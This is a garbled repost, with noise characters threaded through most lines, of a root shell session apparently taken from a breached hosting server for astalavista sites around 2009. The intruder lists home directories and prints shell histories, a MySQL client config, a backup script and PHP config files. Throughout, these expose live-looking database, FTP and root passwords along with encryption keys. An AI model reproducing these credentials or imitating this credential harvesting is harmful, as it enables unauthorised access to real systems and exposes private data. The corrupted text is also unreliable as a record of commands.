- @/ R7 ] K& ?5 Hsh-3.2# cat /etc/motd, g- R) C! }2 S: p9 G" z( x
#####################################################! C# {, Y4 A& W4 x- \1 ^ M
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
# y' E. U( X+ _( x ]# |__| [__ | |__| | |__| | | | [__ | |__| #
/ S1 I5 e" \+ T$ V& E- b" c# | | ___] | | | |___ | | \/ | ___] | | | #
+ {6 Y1 k* I9 @" b& q# #
/ J3 ?, m" X0 F4 w9 J7 M#####################################################7 K8 R6 F- f$ \* Q" p
# #
5 e2 j% ]1 [( o& U) x# Admin Contact - 链接标记support@secureservertech.com #$ W: K1 o5 P3 b, |
# #
% p4 Y8 k: @. Y/ C# Available ShortCuts #- Q0 W+ N* V- v4 G9 }
# #8 q: k- M( L" A$ B U; {
# nst - list active connections #
- U. v0 D' f3 x. |4 f# ddos - shows how many times each ip is connected #. M* C, R# w" D% {
# ltr - restart the webserver #
- c9 F2 u1 P. [9 h7 R" D9 N. |8 B# phpc - edit the php config file #
6 I5 W6 e- o' j) A* l0 |9 Q# htc - edit the webserver configuration file #5 q8 O/ F; ]- n
# up - uptime #9 H* K. K$ u8 P, _" U) Y
# etd - edit the motd of the day file ## d9 P- I* I) Q9 t h' a9 q
# htr - start and restart apache if needed #9 A6 @* m/ e, x0 ~
# syng - shows active SYN_RECV connections #8 c4 \/ S; S) V/ a5 K0 Y% J; ?
# synd - syn flood blocker - “synd -h” for usage #9 U; {# g E& a# V& ]
#####################################################" l, ~" E6 _8 `; Z. j
# NOTES: #
; ^, e; i A9 v; v9 }' r8 Z# Last Upgrade - 12-08-2008 by JF #6 r' a3 M. c& r7 J1 c
# My.cnf/Mysql Optimization - 1-28-09 #0 J9 \8 A+ s9 q% t( q {9 W
# #
. q& W9 }, U2 {% d# #, B7 e! Z3 H5 g b" V
# #
. j. x$ g) o, U( {#####################################################" k& w/ S N7 I& G& E* i# m. i
' Y Q8 }" A1 m: S( h$ j# Fsh-3.2# lastlog | grep -v Never
: ] Q. I" d+ `* @" JUsername Port From Latest1 { Q, S; Y' W
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
8 C% o# `, O- V2 D" ] `7 Sadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
6 K/ k! @6 v, D. v4 H9 `com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
9 a/ Y. P) [1 {, Kastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009 J/ D: r0 z$ d! I0 g r' Z
# w5 }' m, \$ s9 R5 z* Nsh-3.2# ls -la
0 q- [0 [" ~; b/ O5 Vtotal 453376
+ ?/ j) O; I, _% Y: `, ydrwxr-x— 15 root root 4096 Jun 4 08:40 .0 A& T2 T( i6 H) b) Z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 e! P3 S5 M: E! a5 _2 d/ k
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip7 m* ]) u* f8 q2 M0 G4 u
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg8 n) T: h) b& Q/ f. E
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
& V4 W' y4 x& R, w+ [# o2 ~) b$ g-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout6 |8 k7 S( V* {$ Y+ q1 ~( }
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile4 T4 h& @" N# a' F8 a) L5 q# d
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc3 ^" J5 o1 i0 {. j% K6 J9 q/ [
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
2 n5 j1 X- O1 L& W-rw-r–r– 1 root root 1327 Nov 29 2007 cert: Z! b |; h7 N
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql* q0 T. P, Q5 z7 U5 B' f1 B" h$ h
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
( v2 c, x7 L% x' Q1 N1 i-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc6 v7 H, D. x! L" v) S! d% j4 ~
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
! `& y8 B/ `! Y) Ndrwx—— 2 root root 4096 Oct 28 2007 .elinks U9 F U2 J2 a0 w0 E4 ~
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.14 P: M' U1 j; E1 o% A' y+ s
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
0 n( Y) ^* E0 w/ T" H/ l' h-rw——- 1 root root 0 Apr 16 13:19 .history
4 t( F2 Z" O, `" F-rw-r–r– 1 root root 16095 Sep 11 2007 install.log/ \( I$ @- s2 X j) U- k- \$ M U2 E
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog- [" s' R/ o O! `# q
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
$ Q7 u7 Y2 j; D-rw——- 1 root root 35 Jun 2 14:23 .lesshst
9 d& k: P( x( l& Tdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
7 {4 p' g' l7 d* Q! }$ H* ~7 g" Adrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec& F+ q0 Q8 G( l/ v7 B6 y
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz9 T8 K' V' n2 W: ?, w, [
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz26 f) w! x% g% s/ J
-rwx—— 1 root root 760 Sep 18 2008 lp" ?& x* Z: V; ^" V$ E2 v4 \
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
* h0 j; W& ? F. w-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
: k) h: D; S; i$ a- Q2 x. S-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
2 Z" ^' q5 b& @: x3 zdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
3 e+ N; Y, _5 @0 U$ @1 O% r-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz$ _8 r2 ]* Z3 N; ?- w
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.35 s: U% a( l0 k8 \2 q( t" \
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
T& |, ?* }8 j" k1 E6 d! m-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh$ t3 x! O: o, g" V3 u& d3 z
-rw——- 1 root root 41 Oct 19 2007 .my.cnf8 p" l& y) [+ O" q, C# I8 A
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history3 s# \( ~; q o; e$ x
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
0 g1 o4 N% a3 D5 F! m. ~( m/ A-rw——- 1 root root 41 May 20 2008 .mytop
V5 ~& X0 g: X% n2 bdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6; Y2 T P( x' [( X. S: C
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz) O' u$ W6 R$ K" |5 u1 f. ]
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
- ]* k" L. w6 K, H-rw——- 1 root root 1462 Sep 21 2007 opt.php
/ R3 a9 d; m1 \8 E. C* K6 {1 G, u" \-rw-r–r– 1 root root 3371 Sep 22 2007 p
* i7 N# V, e6 l g6 ]! w* V-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2; Z+ j3 W3 K) P) m6 k) e
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
) o% Z- ]* ^1 t' E. j) p-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
* K: C ?0 m$ C5 U! T-rw-r–r– 1 root root 887 Nov 28 2007 server.key9 J* s/ i- h/ h# C' C$ n' ~, f% |
drwx—— 2 root root 4096 Oct 10 2008 .ssh4 K) e1 L' q% B V
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat2 N+ Z( j% ?% e
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc- a4 \4 d, m( _. q3 m2 Z4 q& @
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip2 l2 R9 s: m$ T$ f$ D, o
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
; ]" X) e* D8 g2 Vdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp+ w3 J8 b1 G. F9 F
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
8 R4 M1 ~3 f+ Y& O5 Idrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
4 I- ~4 b) q$ }% s/ {* @-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2 c3 d+ C/ J# i9 b: q) _/ z
-rw——- 1 root root 12997 May 16 2008 .viminfo7 ]2 t6 \) ], R% U3 Z
' U. s# b0 |( C7 ]" H; ash-3.2# cat .bash_history/ m& I+ O3 j7 q e" F M
[snip]
: ?- i& ]* K) z7 o0 dwget cp4sst.com/sstlinux.tar.gz
" U' v& ^, \0 M4 L/ r8 V1 \tar zxvf sstlinux.tar.gz
8 ~' w: ^( b& u* g6 @cd linux-2.6.27.10
* ?: Y3 g( `! X% [sh install.sh" w# q B2 x' [* ]
make bzImage ; make modules ; make modules_install ; make install
( {$ s- H, ~2 U( p0 p9 Zmake clean
; O; ^- t. {+ c7 [service mysqld restart1 B9 L+ Y- `: `, h9 i: d# y4 g
[snip]
1 A* F8 M3 c2 t B' F; Ccd /usr/sbin/
: m* U A. @6 A4 |5 ]chmod 4777 traceroute
& X2 a5 a- D9 E1 `* C" K/ Rchmod 4777 ping
, U7 e2 o& x. _1 x6 vtraceroute -I 链接标记[url]www.astalavista.ch[/url]% Y. R& b2 L4 @" I( ?! u& Q- i8 T6 y
[snip]
* r l% Y0 z7 V" b avi /etc/csf/csf.conf# S( \1 L! e) _ h
traceroute google.ch) u" ?% x+ g6 X3 _! \+ p/ t
service csf restart; w9 q3 T3 Y+ ~5 y: l
tracert google.ch. |% J5 P& b. y C& E
service csf restart% F: T4 _- {1 a" G; M1 b3 j& b
traceroute 链接标记[url]www.google.ch[/url]
# c& o( S1 F. Q, M6 r- ]7 Ztracert 链接标记[url]www.google.ch[/url]
& W- C, O, W) N6 ?$ R1 z4 vtraceroute 链接标记[url]www.google.ch[/url]
: d$ k0 |$ r5 [5 b% k: N: rlocate traceroute4 B# z! x, {& O, `4 k) E n
chown 4755 /bin/traceroute# ~5 g8 u; |0 [4 |: s9 J
chown 4777 /bin/traceroute( D4 W0 c* G& u: Z; n1 r
locate ping
}0 ]. `; c% s" x7 bchown 4755 /bin/ping& `1 e) T) V! A* Z
chown 4777 /bin/ping
* p$ U- F V* w* _ ^cd /bin/
9 s2 D/ `/ [; y4 }$ x0 v; i/ @ls -ali | grep ping
. a, H& n3 q% jchown root ping* z, d7 G1 ?2 p" T% K
chmod 4755 ping g- h8 C+ Z C1 V( x
ls -ali | grep traceroute
) Q7 C, F7 E3 p# u/ ichown root traceroute
' r) U; C1 i1 O8 D2 @chmod 4755 traceroute! `: x Q0 c* ]; w! a3 U
ls -ali | grep traceroute& _. c5 @/ k/ ~4 B
traceroute -I 链接标记[url]www.google.ch[/url]
* k! r$ [& m1 y9 h" L; Itraceroute 链接标记[url]www.google.ch[/url]/ l1 _- Y9 c" }2 s# V% Y+ b- N
whois pmsantos.ch3 n: d7 i' K$ f1 W& R# O
[snip]
) ~" A5 w4 w Q5 a& Vmysql -h com_contrexx2_live < /root/defaultp_ports.sql
$ g; M3 p' y9 }) ymysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
* n' C4 Y/ v- }2 f" d/ |4 Mmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql/ d4 i' J0 m& u5 D( x4 h
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql* t) [! [8 s3 D- P3 c1 [( I% f
top! c( H8 Q0 Z% \, A4 p5 f
ping ssth.ch
/ [# }: @: F/ }% M/ j) xping asdlkfaljgasd???ljg???lasj.ch( P! v- V6 X7 F1 J, g* \
ping asdlkfaljgasdlasj.ch0 i9 ]* a0 o& Y
ping 链接标记[url]www.ssth.ch[/url]$ [ z% Q6 }5 n: a: K
ping ssth.ch/ N3 B) [+ O# r
nslookup 链接标记[url]www.google.ch[/url]0 k# x$ r% E% s" e
nslookup 链接标记[url]www.ssth.ch[/url]# V Z% ~' X$ m2 |
man nslookup
& k) l2 A- w9 _ping 链接标记[url]www.google.ch[/url]) ?5 W# X; u$ J4 e1 }
nslookup 链接标记[url]www.google.ch[/url]3 z& `: l6 l. k" L% L3 Z
nslookup 链接标记[url]www.google.ch[/url]
- l2 C5 T. C u4 y# S3 \2 nnslookup salfjasdlf.ch
- V3 B: d/ a+ m7 g: `& ?2 t[snip]
! l2 x1 {$ g) S. v3 lopenssl passwd -1 sadf2 v: i8 C2 Q: Q2 s" l
openssl passwd -1 5cZNHstdTy
7 }0 ~6 }/ q5 Cmysql
) ~. B( ^9 X! q: n8 Omysql
# w2 `9 \+ X7 t! _+ I( L. glocate proftp
5 v9 c4 H+ n( k6 t+ @6 i6 \0 yvi /etc/proftpd.passwd
* e% a7 q' }% Q+ \+ t' j4 gservice proftpd restart
" Q( y# u5 A/ w N1 jlocate proftpd.conf$ n& a0 F: {* c, m8 k6 Y' S) X
vi /etc/proftpd.conf
% `* i: y/ f' u1 ?: yvi /etc/proftpd.passwd4 ^& `+ Y3 X8 _$ w- B& i
service proftpd restart
! N6 q$ m. [1 m( L3 K[snip]
" ?' k3 G" c% t0 y/bin/sh /home/com/backup_system/backup.sh
; [ }# {# c3 x9 xtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin" i5 g# N3 t( s7 b9 r& W6 ~# J
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql# H: b+ e; u" U& U
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql1 A- h5 c" ?8 ?9 J& _% w
ls -ali! o( V+ ?) |7 _% O" o/ \& ^" [
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql$ l" w! @$ l- X# p5 e3 u$ h) S) a
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql/ N6 O' a; o3 C
crontab -l. Z% }+ i9 k' B% _9 p$ Q: v- a
crontab -l, E1 C m i# a7 m1 }0 o; G4 H
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
3 k0 w) X! }# t! ^, |/home/com/public_html/modifications/cronjobs/exploits.sh- K+ h2 z3 g" ]2 M
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]' U- M! O7 e* H9 ?5 d& s2 k! m
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz% J, c6 ^- v! F8 P8 r5 l" x" L
cd lsws-4.0.3
0 b& n) @+ E' B2 rsh install.sh
2 y( X7 N! N# _6 o. wuptime( Z' l, L& {5 y* L* O2 P8 T
hdparm -tt /dev/sda
. T7 z; z* ~3 h8 S2 r( ]# viostat
8 H; t3 m( C4 [4 J. b& oyum install iostat
2 i8 U4 Z. \% W! \. ], Y3 n1 ]iostat( p3 C) j5 o6 Q: u3 ~
whereis iostat
. X" |2 c7 G5 c2 a. h3 ]yjm clean all- Y9 M2 k$ T: W- K; _; H5 r
yum clean all ; yum -y update {4 P L) @ j, I w, Q
iostat
5 w4 i9 Q8 I# I: B8 G1 \3 Q4 Y1 u" ]yum install systat! C6 D7 r. Z& v$ u& ^! ~3 D
rpm -qa | grep iostat
) c c4 N' A, hrpm -qa | grep sysstat
3 _7 ~. l0 Z' B$ _: b' Nrpm -qa | grep systat
2 M0 p; C% ?" j9 D" Kdmesg -c2 h9 G/ {9 `+ P9 C$ z+ A4 |5 i4 @
sysctl -p
& Y" {/ q( L' g+ e8 X( }uname -r9 u" B& Q+ h, S/ F! p+ U
cd /usr/src/ P+ G, c0 B! W) M. y
wget nix101.com/kernels/sstlinux.tar.gz
6 g9 v) h3 A3 i% jshutdown -r now
2 [. h! R* d+ C( U Ynano -w /boot/grub/grub.conf+ |: O& f% X! e$ i
) w! Y( \4 _+ h+ P( H7 z3 Hsh-3.2# cat .my.cnf7 f2 J% G8 N3 ]7 [
[client]' Q& `$ ~, P4 ]- P& T" v
user=da_admin
/ R9 y: J( p1 x- d9 C9 upassword=X9dctmRH( r' }! |2 W- m* B
% K1 s' e \. f
sh-3.2# cat /home/com/backup_system/backup.sh$ G) \7 r: ]" S; W, m3 h; q
#!/bin/sh
1 [, l( F2 `0 m7 ^6 Q% }1 r#####################################################################
% ~2 x! P5 R" O# f# A# U# #
, M- f& v" J( o: n1 ]! c/ J% a% q+ A# incremental backup for astalavista.com #
% y1 c, u. `+ [: Q" Q# #% L7 B) L5 u- t4 F6 b
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
: u* w9 W1 O7 Z6 s Z7 W- D& d' `# #4 Y& A V( ^% F [, R9 `# d
#####################################################################
0 F, L6 }$ `- y9 |% G8 C. i[snip]
2 k7 T( x$ Q) c! r0 PPROG_DIR=”/home/com/backup_system”;
6 c4 C8 }' h. D0 _- P7 M0 ?4 ~BACKUP_DIR=”/home/com/backups”;7 i/ K1 |1 O# w) L4 L9 S" P: }
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
9 ^( U7 g/ x) F4 x5 O0 D. H# ftp for synology backup server% u) U% ?' y7 Y/ j4 G2 P
FTP_HOST=”212.254.194.163″;% l6 |& h) g6 G7 X1 L
FTP_PORT=”21″;" }/ k! G# \0 O0 z
FTP_USER=”astalavista.com”;2 ^+ S7 g% G# ~/ Q
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
0 z' P M; r3 m: N+ n& m+ BFTP_DIR=”/astalavista.com”;
) o7 A1 T4 X/ d v" r: l- ]# database5 a: f4 x: }8 a) A2 r' v% H
DB_HOST=”localhost”;
o) s! ?4 ^+ X) V& o# k- z% F$ x5 oDB_USER=”contrexxuser2″;0 a" i) q, e1 t
DB_PASS=”0fEYNZgXz1pKe”;! _" `6 L: l/ I! n
DB_DATABASE1=”com_contrexx2_live”;
+ w/ @- l; D% K% T* S4 yDB_DATABASE2=”com_contrexx2″;
- V; O" Z8 N8 W' q[snip]
; {7 G2 F5 I1 `8 w+ Zftp -in $FTP_HOST $FTP_PORT <<EOF
7 x/ n& L/ e2 Y) |: \5 Aquote USER $FTP_USER% `& q# f h! k7 i; |- y7 t6 T
quote PASS $FTP_PASS
# z/ M9 L+ N qcd $FTP_DIR
# C$ ~6 v! Z5 l$ l( N+ O- Rput $DB_FULLNAME-SQL_Dump.tar
% j1 G8 Q ^8 v M$ X9 N J; D( rput $BACKUP_FULLNAME-Public_HTML.tar
2 q4 ? Y' y. D. Yclose( T# \) W: V9 y2 ^+ ~$ N! j( T" H
bye
3 Q- o. a: @0 [) d9 YEOF
1 I2 D8 X* c& e9 G T. @9 c
! r1 {5 Q! @6 A3 c& Ssh-3.2# cd /home/ ^' h! j" G6 H: {5 \1 H; i
sh-3.2# ls -la- J5 r6 V( b' B
total 120+ |$ f4 q1 p" h# T, Y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
1 P8 t+ m- N) pdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( n5 h6 Z, K( X* M
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin5 _0 v3 a# I1 ?3 V) X
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group$ w* @# o- Q5 H# B5 p% \
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
$ K$ R$ `2 u" X5 h1 l: adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet; n* S. ^4 o, T- b0 B+ ^
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
8 C1 B" l) Z a9 D# {5 D$ Y1 O' idrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 l# ~" ?/ d# ^: q& t- ~
drwx–x–x 10 com com 4096 Apr 28 12:40 com) L' m$ C1 u3 e w% Y
drwxr-xr-x 2 root root 4096 May 17 2007 ftp. P" M# H" E$ S$ i2 \
drwx—— 3 jon jon 4096 Sep 21 2007 jon- H4 v% C$ B6 q/ @9 T! O6 \
drwx—— 2 root root 16384 Sep 11 2007 lost+found( G# G7 d1 M# ~% w! \0 _! y
drwxr-xr-x 2 root root 4096 Sep 14 2007 my( V3 o0 d9 v) p: I
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata1 B0 f# A: a* _
drwx—— 2 jon jon 4096 Sep 15 2007 test
: F- |/ ~- }! ~ X5 R9 ]# Gdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
. @, Y" ~6 ?! b0 A; O
2 D S( `4 {+ e) h; Tsh-3.2# cd admin
) _1 w) Q' ^6 m' R, P! Z! w* s' Qsh-3.2# ls -la0 ?* K3 W, j: {+ H/ z/ P' x6 h
total 1735896* `: U$ z0 i% b6 C6 w# S" w
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
* v, C: j5 p& u3 r' O2 q( S8 rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 w3 O. f& Z, F/ d/ {7 X0 \drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups7 Z5 _( r. u8 O+ p2 R" N
drwx—— 2 admin admin 4096 Sep 28 2007 backups9 X2 W& S ?+ Y( H* ^( W( ]
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history4 `& y# [# Z6 ~! l
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
- { `& J5 s* k) Q1 M-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
, v' }; G/ F4 I$ q9 H-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
" i6 e! ]* r6 {3 ]/ N5 Tdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups$ V+ t" |* Z- j [2 O0 w
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
b. Q& w/ E( w. C" E! ]drwxrwx— 3 admin mail 4096 Sep 21 2007 imap y8 A$ ] A6 C% x$ V8 @* i
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
9 s; j; Z7 c8 O" o' ]4 Xdrwx—— 2 admin admin 4096 Sep 21 2007 mail: \3 M/ E q1 L) m, e0 E) C6 M
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr/ d4 ], u ~/ V3 l5 C
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
7 e# n) L9 b* A! b$ x3 d-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
; G/ x! |1 h) T; @7 i0 L' Y-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
) W+ J+ `) H8 I! _drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups4 r Q7 `) I4 i2 t" Y! W
) H5 K7 j1 ?: s/ p/ n
sh-3.2# ..
; {9 e1 n8 s+ d, Y* g6 Tsh-3.2# cd jon
3 G" H0 S- E J, ~8 w Esh-3.2# ls -la" y! V! l+ f4 I9 X8 I4 m2 p
total 36
5 k# B3 N( f/ Vdrwx—— 3 jon jon 4096 Sep 21 2007 .! v7 ^. {8 D8 p
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" d5 }. c" [1 q+ P-rw——- 1 jon jon 53 Sep 21 2007 .bash_history& X& y2 K6 |+ [4 h- L: P1 j
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout3 s; k5 A2 O; h3 H, F
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
& g" ^) e% |& ?-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc8 \# [/ G: t: W/ l
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
( M& _2 C9 ^) W0 K" d! H* h3 wdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html5 [6 J, g" H0 F5 H) R: s( S6 W( r0 C
H; o- o( G1 k/ M* _8 ~3 dsh-3.2# cd ..9 r+ [1 e( y7 m' d, F& V- v
sh-3.2# cd test
) g5 a. ^+ ? j( u6 Wsh-3.2# ls -la
/ n. z! f; K6 q0 f* l+ s$ C W: Wtotal 48$ h( x# y0 Z( C; j
drwx—— 2 jon jon 4096 Sep 15 2007 .
- V* d& V8 y- U$ m9 ~2 J9 Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 w# l8 |: m+ K# d7 G) A-rw——- 1 jon jon 79 Sep 21 2007 .bash_history! U4 a0 c+ A) i' u- T1 l9 ^; m1 s1 M
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
( w0 S. U8 [/ q( l& u9 {-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
) h& C4 @# v* M l8 p! {-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc6 k+ q& T/ W& U Z; p' x
sh-3.2# cat .bash_history
9 D9 e1 g) }3 n: B2 a+ K2 J/usr/bin/mysqladmin -u root password PoliuJhytg67( s# z3 t* l' v. B# F3 r
- e Q) D" I& D! ?
sh-3.2# cd ..; ` G4 T2 T6 J2 `
sh-3.2# cd astanet
, f4 a+ @) @$ E9 A" w- |sh-3.2# ls -la
" a5 F2 q& B, M" [/ g, Ktotal 52
: n& [; S0 a" z" b- q! u. i. xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
6 z9 J$ T* t* Y9 z% M/ `" ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
9 v8 k4 k: m4 _8 wdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
- Y3 ?( h5 N2 C2 w9 J% w9 Y0 w" n-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history5 u0 B' M, K. l; _& I, _4 I
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout9 B. y+ A: F* o' r; ?+ p
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
$ u$ [& d0 k. g6 O! B1 C-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc" `" z3 w9 q N: j1 M: I# a9 R
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains' g1 h+ ~+ m8 F. @
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap, w4 I! b8 l; P; S
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail; R" W0 F$ }, ?
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
& D/ B4 [' I6 r, g# w0 `lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
6 J$ _' u5 G T+ W-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow; |2 O& b" g, u( s1 X5 C
8 T% K6 P" m' O9 K2 O9 d
sh-3.2# cd auth/
8 ^( Z# V7 ^0 R6 a6 m9 E) _* {sh-3.2# ls -la
3 c+ Y0 M- ~9 o) O) Ctotal 284 w' {: q. U4 H5 K$ v& b/ d: m0 s& n
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
' F _/ n# [% xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
$ B' W) F- F! w0 |, }: t-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
* ^. S9 ~: K+ e; v: d-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php- |. c$ U$ o* l; c
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd: G4 B5 V9 ]* v6 o1 k F( b
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
c) H0 w' B9 S-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
) N3 i% {& ^ q& ^* v4 K/ a2 @& c! m! u/ A! {. v8 B3 R& N
sh-3.2# cat hackercontest.config.inc.php) n( w1 x; `' w7 o* u, B
<?PHP6 s' e% z9 _' E( E
// Variabeln f?r Verbindung zur Datenbank //
& J3 G6 T# d7 C, D- S- a$conxHost = ‘localhost’; // MySQL hostname
6 ]- M$ w" h% |# M% p7 R- B2 H$conxUser = ‘hackercontest’; // MySQL user
3 A" W- E- I' m' a; A$conxPassword = ‘K6m@7dUc’; // MySQL password1 A2 g4 j" [- }9 M) R
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
3 q8 h: N6 Q! A- X/ _- |?>, ?! S! w1 r1 y' S
sh-3.2# cat hosting.config.inc.php
2 N1 E8 c8 i6 T. `! |<?PHP6 q; r7 {8 F' H; V
// Variabeln f?r Verbindung zur Datenbank //0 w# D1 b: K1 x; `# v% J% f* W( }0 P
$conxHost = ‘localhost’; // MySQL hostname
# T9 H! j8 d% {$conxUser = ‘hostinguser’; // MySQL user$ R& B( [( I) |- ?$ X# U
$conxPassword = ‘cXvB3981′; // MySQL password
5 L" r6 j% U" L9 x$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
+ t4 r+ y9 F( b( ]: g?>! K4 r/ V! r; w8 x: o$ h' B
! S$ V. Y1 g& f* Y% ]- e
sh-3.2# cd ..
4 a9 t5 Z( L6 K3 y2 zsh-3.2# cd com9 @+ j8 K" z+ O; Q( w3 O3 H+ e
sh-3.2# ls -la7 w$ S9 g9 K9 F5 p! R
total 141208
